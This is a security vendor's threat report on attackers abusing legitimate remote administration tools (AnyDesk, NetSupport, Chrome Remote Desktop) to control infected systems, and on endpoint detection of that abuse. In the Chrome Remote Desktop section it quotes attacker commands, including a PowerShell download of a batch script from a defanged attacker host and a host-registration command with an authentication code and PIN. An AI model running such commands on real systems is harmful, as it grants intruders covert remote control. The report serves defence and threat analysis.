Infected Systems Controlled Through Remote Administration Tools (Detected by EDR)

Remote administration tools are software for managing and controlling terminals at remote locations. The tools can be used as work-at-home solutions in circumstances such as the COVID-19 pandemic and for the purpose of controlling, managing, and repairing unmanned devices remotely. Such remote control tools used for legitimate purposes are called RAT, meaning “Remote Administration Tools.”

Additionally, backdoor malware types such as Remcos RAT, njRAT, Quasar RAT, and AveMaria are called Remote Access Trojans (RAT) because these also make it possible to control infected systems remotely. Such “Remote Access Trojan” malware types offer not only remote control features but also various features that can be used maliciously, such as keylogging or commands for stealing account credentials from the infected system. Of course, there are cases such as that of Remcos RAT where the developer promotes its normal features and states that malicious use is prohibited, but the features being offered are mostly used for malicious purposes. [1]

Generally, threat actors often use “Remote Access Trojans” to control the infected systems. Yet such malware are easily detected by firewalls or anti-malware products. Accordingly, there have been an increase in cases where “Remote Administration Tools” are installed to control the infected system and attempt to bypass security products.

1. Threat Monitoring Using EDR

“Remote Administration Tools” are often used for legitimate purposes such as working from home or remote control and management. As such, there are limits to anti-malware products simply detecting and blocking these tools unlike other malware.

Threat actors take advantage of this fact and sometimes install remote administration tools instead of RAT-type malware in the initial access or lateral movement stages to control the target system. As mentioned above, systems with only anti-malware products installed cannot completely block such attacks. EDR must be used to monitor and respond to suspicious behaviors.

AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution, providing powerful threat monitoring, analysis, and response capabilities for endpoint areas based on South Korea’s only self-behavior-based engine. It continuously collects information related to suspicious behaviors based on each type and offers features that allow users to accurately identify threats in light of detection, analysis, and response. Through a comprehensive analysis based on the data, users can identify the cause, make appropriate responses, and establish recurrence prevention processes.

2. AnyDesk

AnyDesk is a remote control application that provides various features such as remote desktop and sending files. Remote desktop is a program that allows a user to remotely access an environment where RDP or AnyDesk is installed and control it in a GUI environment.

When a user has AnyDesk installed in their environment and there is an external access to the system, a message pops up. If the user allows that access, the system can be remotely controlled. Alternatively, one can set up a password for AnyDesk: simply entering the password makes it possible to remotely control the system without the user’s permission. As such, AnyDesk is known to be used alongside Cobalt Strike by attackers wishing to dominate a company’s internal network, such as the Conti ransomware group.

AhnLab EDR collects and provides behaviors of users using AnyDesk for legitimate remote control purposes, allowing them to recognize and respond to suspicious behaviors.

In a past attack case, a threat actor installed AnyDesk on a poorly managed MS-SQL server. [2] The threat actor used Meterpreter to download and execute a PowerShell script. This script downloaded AnyDesk from the official website as shown below to install it in silent mode and set the password to “wocaoybb”.

If AnyDesk is installed on the infected system using the method mentioned above, the attacker can access the infected system and remotely control it without the user’s permission by entering a password.

AhnLab EDR detects the behavior of threat actors installing AnyDesk in suspicious ways as shown above to let administrators become aware of such behaviors.

3. NetSupport

NetSupport is a remote control tool similar to AnyDesk. Besides remote screen control, it provides features such as taking screenshots, sharing clipboard content, collecting web history information, managing files, and executing commands.

AhnLab EDR collects and provides behaviors of users using NetSupport for legitimate remote control purposes, allowing them to recognize and respond to suspicious behaviors.

Many threat actors abuse NetSupport because unlike other remote control tools, it supports features that can be used for malicious purposes. In addition, it can be run using only key internal files without the need for an installation process using a normal installer. It is distributed by spam emails disguised as invoices, shipment documents, and purchase orders or luring users to install it themselves using a phishing page disguised as an update page for software called SocGholish, both of which have occurred until recently. The ASEC Blog once covered a case of NetSupport distribution disguised as a Pokemon game. [3]

The threat actor created a phishing page disguised as a Pokemon card game page, luring users to download the setup file from it. The downloaded file is a malware that installs NetSupport, creating and executing legitimate NetSupport instances as well as a configuration file manipulated by the threat actor. Whenever threat actors distribute malware, they evade file detection by anti-malware products by changing the file type. As a result, there is a limit to file-based detection. The behavior is also that of installing NetSupport that is legitimate software, and anti-malware products cannot completely detect and block such behaviors.

AhnLab EDR detects the behavior of a suspicious executable file installing NetSupport to let administrators become aware of such incidents.

4. Chrome Remote Desktop

Google offers a feature called Chrome Remote Desktop. When the remote desktop program is installed in a certain system with a user account, the Chrome web browser can be used to remotely control that system. In most cases, remote control settings are configured in the Chrome browser of the remote control target. However, Chrome also supports the method of directly installing a remote control host program in the system.

For example, the Chrome Remote Control Host program can be installed in the target device for control, which allows command line commands to be executed with the following arguments. These commands can be created after logging into the Chrome web browser with the authentication code being different for each session.

“%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”authentication code” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME%

If you enter the PIN number after the commands shown above are executed, the Chrome browser will show that the remote control target device is online. Connecting to the target device and entering the PIN number used when executing the Chrome Remote Control Host will allow the target to be controlled through the Chrome web browser.

AhnLab EDR collects and provides behaviors of users using Chrome Remote Desktop for legitimate remote control purposes, allowing them to recognize and respond to suspicious behaviors.

The Kimsuky group known to be supported by North Korea usually launches attacks for the purpose of exfiltrating internal information and technology from organizations. Accordingly, after installing backdoor-type malware, the group would activate RDP or additionally install malware such as VNC to control the infected system remotely. There were recent cases of exploiting Chrome Remote Desktop to control the infected systems. [4]

The threat actor executed the following PowerShell commands to install the Chrome Remote Desktop Host installer, downloading and executing 23.bat which controls the Host program after the install process was complete.

powershell wget hxxps://dl.google[.]com/dl/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -outfile c:\programdata\cm.msi powershell wget hxxp://****[.]kr/gnuboard4/23.bat -outfile c:\programdata\23.bat

The content of the file 23.bat is similar to the Chrome remote desktop execution commands shown above, given the “–pin” argument to be run without any additional tasks from the command line. The authentication code used in the attack was created with the threat actor’s Google account. Subsequently, the threat actor was able to control the infected system from their Chrome web browser.

“%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”4/0AbUR2VPfKC4jyx4j-ARJD2NwkebJQOTbicMGcNW1kUn7UNhE0VNaycr3zDhY4tRx9JT4eg” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% –pin=230625

AhnLab EDR detects the behavior of Chrome Remote Desktop being executed under suspicious circumstances and let administrators become aware of the incident.

5. Conclusion

Recently, there has been an increase in the number of cases where threat actors installed remote control tools to control targets systems instead of installing additional malware such as RATs and backdoors. Remote administration tools are legitimate software that can be used to control or manage terminals at a remote location.

By installing remote administration tools in a target system, the threat actor was able to simultaneously obtain control over the system and bypass anti-malware security products. This is because there are limits to anti-malware products simply detecting and blocking remote administration tools which are legitimate.

Even when users use remote administration tools for legitimate remote control purposes, AhnLab EDR collects and provides related data to allow administrators to recognize and respond to suspicious behaviors. Also, when remote administration tools are installed under suspicious circumstances, such behaviors are detected as threats to enable administrators to identify the cause, make adequate responses, and establish recurrence prevention processes.

Behavior Detection
– Execution/DETECT.AnyDesk.M11495
– Execution/EDR.AnyDesk.M11496
– Execution/DETECT.NetSupport.M11497
– Execution/EDR.NetSupport.M11498
– Execution/DETECT.RemoteDesktop.M11499
– Execution/EDR.RemoteDesktop.M11500